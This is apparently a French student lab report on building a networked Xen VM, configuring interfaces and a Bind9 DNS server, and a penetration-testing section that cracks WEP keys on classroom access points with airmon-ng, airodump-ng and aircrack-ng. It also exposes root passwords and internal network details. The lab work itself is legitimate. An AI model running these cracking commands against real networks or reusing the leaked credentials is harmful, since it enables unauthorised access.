TP sysres IMA2a5 2020/2021 G5
Sommaire
- 1 Introduction
- 2 Installation des systèmes d’exploitation
- 3 Architecture réseau
- 3.1 L’architecture générale
- 3.2 Les réseaux virtuels
- 3.3 Le routage de site (IPv4)
- 3.4 Le routage de site (IPv6)
- 3.5 Interconnexion avec Internet (IPv4)
- 3.6 Interconnexion avec Internet (IPv6)
- 3.7 Interconnexion Internet de secours (IPv4)
- 3.8 Interconnexion Internet de secours (IPv6)
- 3.9 Sécurisation du réseau
- 4 Services Internet
- 5 Tests d’intrusion
- 5.1 Description
- 5.2 Installation de la clef Wifi
- 5.3 Installation du paquetage AirCrack-ng
- 5.4 Utilisation de AirCrack pour clef WEP
- 5.5 Exploitation de failles du système
- 5.6 Cassage de clef WEP d’un point d’accès WiFi
- 5.7 Cassage de mot de passe WPA-PSK par force brute
- 5.8 Attaque de type "homme au milieu" par usurpation ARP
- 5.9 Intrusion sur un serveur d’application Web
- 6 Réalisations
Introduction
Cet atelier consiste en la réalisation d’une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. D’un point de vue système vous aurez à installer une machine virtuelle Xen et à y configurer des services. Enfin la mise en place d’un réseau WiFi sécurisé et d’un site web sécurisé vous permettent de mettre en pratiques vos connaissances en la matière.
Tableau Récapitulatif
| Description | Détails |
|---|---|
| ID VLAN | Vlan7 |
| Réseau IP V4 | 193.48.57.168 |
| Réseau IP V6 | |
| Nom de de la VM | mirage |
| Numéro de poste | Zabeth06 |
| Adresse du site internet version HTTP | |
| Adresse du site internet version HTTPS |
Installation des systèmes d’exploitation
Pour installer une Machine Virtuelle, il faut d'abord se connecter sur le disque de virtualisation. Pour cela, il faut utiliser la commande :
ssh capbreton.plil.info
Installation dans la machine virtuelle Xen
Une fois connecter, il faut lancer la création de la Machine virtuelle avec la commande :
xen-create-image --hostname=mirage --dhcp --dir=/usr/local/xen --dist=ascii --apt_proxy=http://proxy.polytech-lille.fr:3128 --mirror=http://fr.deb.devuan.org/merged/ --force
L'installation prend un certain temps pour regarder si l'installation se déroule bien, on peut ouvrir un second terminale connecté en SSH a "capbreton" puis on utilise la commande :
tail -f /var/log/xen-tools/mirage.0.log
A la fin de l'installation, on obtient le mot de passe root et des informations importantes :
Installation Summary
---------------------
Hostname : mirage
Distribution : ascii
MAC Address : xxxxxxxxxxx
IP Address(es) : dynamic
SSH Fingerprint : SHA256:xxxxxxx (DSA)
SSH Fingerprint : SHA256:xxxxxxx (ECDSA)
SSH Fingerprint : SHA256:xxxxxxx (ED25519)
SSH Fingerprint : SHA256:xxxxxxx (RSA)
Root Password : DgtUlOmnBFERdfarGBsopGR
Une fois la VM créer, nous pouvons la lancer avec la commande :
xl create /etc/xen/mirage.cfg
On peut vérifier que le VM est bien démarrer avec la commande :
xl list
Pour fonctionner l'état de la VM doit être r ou -b
On accède pour la premier fois a nottre Vm avec la commande :
xl console mirage
il demande alors le login (root) et le mdp (longue chaine précédemment générée). Après nous être logué, on change le mot de passe qui devient : glopglopglop.
Configuration de la machine virtuelle Xen
Il faut maintenant installer les packages que nous avons besoins :
apt-get update apt-get install VIM
Il faut configurer l'adresse IP et le mask de la VM. Pour cela on utilise la commande :
vim /etc/network/interfaces
Dans interfaces on tajoute
auto eth0 iface eth0 inet static address 193.48.57.168 gateway 193.58.57.163 netmask 255.255.255.248
Pour que la machine soit joignable par SSH via l'extérieure il est nécessaire de configurer la passerelle et le ssh_config. Pour cela on utilise la commande :
vi /etc/ssh/ssh_config
Le fichier ssh_config doit être configurer comme ci dessous :
Host * SendEnv LANH LC_* HashKnownHOST yes GSSAPIAuthentification yes
Sur Capbreton, une paserell doit être mis en place pour pouvoir connecté les VM aux monde extérieure. Pour cela on configure ces interfacte avec la commande :
vim/etc/network/interfaces
Puis on configure la passerelle comem ci dessous :
# The loopback network interface auto lo iface lo inet loopback # Physical Network Interfaces # auto eth iface eth inet static address 192.168.0.29 netmask 255.255.255.0 gateway 192.168.0.1 auto eth0 iface eth0 inet manual post-up ip link set $IFACE up post-down ip link set $IFACE down auto eth1 iface eth1 inet manual post-up ip link set $IFACE up post-down ip link set $IFACE down auto eth2 iface eth2 inet manual post-up ip link set $IFACE up post-down ip link set $IFACE down auto eth4 iface eth4 inet manual post-up ip link set $IFACE up post-down ip link set $IFACE down auto eth5 iface eth5 inet manual post-up ip link set $IFACE up post-down ip link set $IFACE down auto eth6 iface eth6 inet manual post-up ip link set $IFACE up post-down ip link set $IFACE down auto eth7 iface eth7 inet manual post-up ip link set $IFACE up post-down ip link set $IFACE down # Main trunk bridge # auto Trunk iface Trunk inet manual bridge_ports eth4 eth5 post-up ip link set $IFACE up post-down ip link set $IFACE down # Virtual Network Interfaces # auto vlan48 iface vlan48 inet static vlan-raw-device Trunk address 172.26.191.21 netmask 255.255.252.0 gateway 172.26.191.254 iface vlan48 inet6 auto auto vlan500 iface vlan500 inet manual vlan-raw-device Trunk post-up ip link set $IFACE up post-down ip link set $IFACE down auto vlan502 iface vlan502 inet manual vlan-raw-device Trunk post-up ip link set $IFACE up post-down ip link set $IFACE down # Bridge for IMA5sc group # auto IMA5sc iface IMA5sc inet manual bridge_ports eth0 eth6 # Bridge for IMA2a5 # auto IMA2a5 iface IMA2a5 inet manual bridge_ports eth1 eth7 # Bridge for L3MRIT group # auto L3MRIT iface L3MRIT inet manual bridge_ports eth2 # Bridge for GIS group # auto bridgeGIS iface bridgeGIS inet manual bridge_ports vlan502
Architecture réseau
L’architecture générale
Les réseaux virtuels
Le routage de site (IPv4)
Le routage de site (IPv6)
Interconnexion avec Internet (IPv4)
Interconnexion avec Internet (IPv6)
Interconnexion Internet de secours (IPv4)
Interconnexion Internet de secours (IPv6)
Sécurisation du réseau
Services Internet
Serveur SSH
Serveur DNS
Un serveur DNS (Domain Name System) permet d'effectuer correspondance entre un nom de domaine et une adresse IP. Grâce à DNS, il n'est pas nécessaire de se souvenir des adresses IP pour naviguer sur Ethernet. Pour installer notre propre serveur DNS nous avons utilisé Bind9.
Nous commençons tout d'abord par installer bind9 via la commande suivante : apt-get install bind9
Création et configuration named.conf.local
Le named.conf.local permet de faire pointer un nom de domaine pleinement qualifié (FQDN fully qualified domain name) sur une adresse IP.
Il faut tout d'abbord modifié le fichier /etc/bind/named.conf.local qui contient la configuration DNS et y déclaré les zones associées au domaine ainsi qu'un fichier de description de la zone.
Puis créé le fichier de configuration appelé db.ima2a5-glopglop.site.
Configuration gandi.net
Grâce au registrar gandi.net, nous avons réservé le nom de domaine glopglop.site. L'extension .site
On va maintenant ajouter un "glue record" qui est un enregistrement collé. Il permet d'associer un nom d'hôte avec une adresse IP au registre. Glue records fournis par gandi pour associer un hostname (nom de serveur ou DNS) à l'adresse IP de notre machine. Les modifications seront effectives entre 12 et 24 heures.
Configuration du nom de serveur
Sécurisation de site web par certificat
Sécurisation de serveur DNS par DNSSEC
Tests d’intrusion
Description
Un ordinateur portable et une clef Wifi est fourni par Monsieur Redon. Pour que le clef fonctionne il est nécessite pas nécessairement de la configuration. Il faut aussi installer les paquetages nécessaire pour craquer la clef Wep et la clef WPA
Installation de la clef Wifi
Avec la commande lsusb on peux voir la list des interfaces connecté aux pc. Ci-dessous les résultats obtenu.
Bus 003 Device 004: ID 148f:5370 Ralink Technology, Corp. RT5370 Wireless Adapter Bus 003 Device 002: ID 8087:0024 Intel Corp. Integrated Rate Matching Hub Bus 003 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub Bus 004 Device 001: ID 1d6b:0003 Linux Foundation 3.0 root hub Bus 002 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub Bus 001 Device 004: ID 413c:2003 Dell Computer Corp. Keyboard Bus 001 Device 003: ID 046d:c016 Logitech, Inc. Optical Wheel Mouse Bus 001 Device 002: ID 8087:0024 Intel Corp. Integrated Rate Matching Hub Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub
La clef ubs Wifi est bien détécter. On doit donc installer le pilote pour les clef usb RT5370 avec la commande :
apt-get install firmware-ralink apt-get install firmware-misc-nonfree
Une fois les pilotes installer, on récupéère le nom de l'interface wifi avec la commande ip l et on récupère le résultat ci-dessous :
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN mode DEFAULT group default qlen 1000 link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast master bridge state UP mode DEFAULT group default qlen 1000 link/ether 00:22:4d:7a:f1:c3 brd ff:ff:ff:ff:ff:ff 3: eth1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast master bridge state UP mode DEFAULT group default qlen 1000 link/ether 00:15:17:3b:14:a8 brd ff:ff:ff:ff:ff:ff 5: bridge: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP mode DEFAULT group default qlen 1000 link/ether 00:15:17:3b:14:a8 brd ff:ff:ff:ff:ff:ff 6: vmnet1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UNKNOWN mode DEFAULT group default qlen 1000 link/ether 00:50:56:c0:00:01 brd ff:ff:ff:ff:ff:ff 7: vmnet8: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UNKNOWN mode DEFAULT group default qlen 1000 link/ether 00:50:56:c0:00:08 brd ff:ff:ff:ff:ff:ff 8: wlx40a5ef059784: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc mq state DOWN mode DEFAULT group default qlen 1000 link/ether 40:a5:ef:05:97:84 brd ff:ff:ff:ff:ff:ff
La clef wifi s'apelle donc wlx40a5ef059784 on fait maintenant un ip link set wlx40a5ef059784 up>
Avec la comande dmsg on vérifie que la clef wifi fonctionne bien.
Installation du paquetage AirCrack-ng
Pour installer AirCrack (utilitaire qui permet de casser les clefs WEP et WPA), il faut de taper la commande :
apt-get install aircrack-ng apt-get install firmware-misc-nonfree
Utilisation de AirCrack pour clef WEP
Après avoir branché la clef WiFi, on se sert de airmon-ng qui est un utilitaire qui espionne le réseau et permet d'obtenir les types d'interfaces communicantes/espionnable.
airmon-ng
Pour tenter de s'y connecter en tant qu'espion, il faut alors taper (nous le tapons ici avec wlan0mon):
airmon-ng start wlx40a5ef059784
Puis, pour observer et découvrir les canaux associés au réseau et leurs SSID,il faut taper:
airodump-ng wlan0mon
On obtien le résultat ci dessous :
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
38:0E:4D:B0:E9:E0 -1 0 1 0 1 -1 WPA <length: 0>
04:DA:D2:9C:50:51 -30 49 834 0 9 54e. WEP WEP cracotte02
04:DA:D2:9C:50:5A -29 44 841 0 9 54e. WEP WEP cracotte11
04:DA:D2:9C:50:56 -28 53 832 9 9 54e. WEP WEP cracotte07
04:DA:D2:9C:50:57 -29 54 803 0 9 54e. WEP WEP cracotte08
04:DA:D2:9C:50:59 -30 50 833 0 9 54e. WEP WEP cracotte10
04:DA:D2:9C:50:54 -29 48 841 0 9 54e. WEP WEP cracotte05
04:DA:D2:9C:50:50 -29 50 841 0 9 54e. WEP WEP cracotte01
04:DA:D2:9C:50:5B -29 50 825 0 9 54e. WEP WEP cracotte12
04:DA:D2:9C:50:53 -33 46 843 0 9 54e. WEP WEP cracotte04
04:DA:D2:9C:50:58 -28 50 694 0 9 54e. WEP WEP cracotte09
04:DA:D2:9C:50:55 -30 49 746 0 9 54e. WEP WEP cracotte06
04:DA:D2:9C:50:52 -33 50 764 0 9 54e. WEP WEP cracotte03
00:14:1B:60:8C:28 -30 60 0 0 4 54e. WPA2 CCMP PSK kracotte09
00:14:1B:60:8C:22 -31 55 0 0 4 54e. WPA2 CCMP PSK kracotte03
00:14:1B:60:8C:27 -32 64 0 0 4 54e. WPA2 CCMP PSK kracotte08
00:14:1B:60:8C:24 -34 58 0 0 4 54e. WPA2 CCMP PSK kracotte05
00:14:1B:60:8C:23 -31 63 0 0 4 54e. WPA2 CCMP PSK kracotte04
Le réseau que nous voulons craquer est cracotte05 ssid : 04:DA:D2:9C:50:54 chanel : 9
On utilise la commande airodump-ng -w reseau_cracotte05 -c 9 --bssid 04:DA:D2:9C:50:54 wlan0mon. cela nous crée un reseau_cracotte05-01.cap On n'as pluq qu'a faire un aircrack-ng reseau_cracotte05-01.cap .
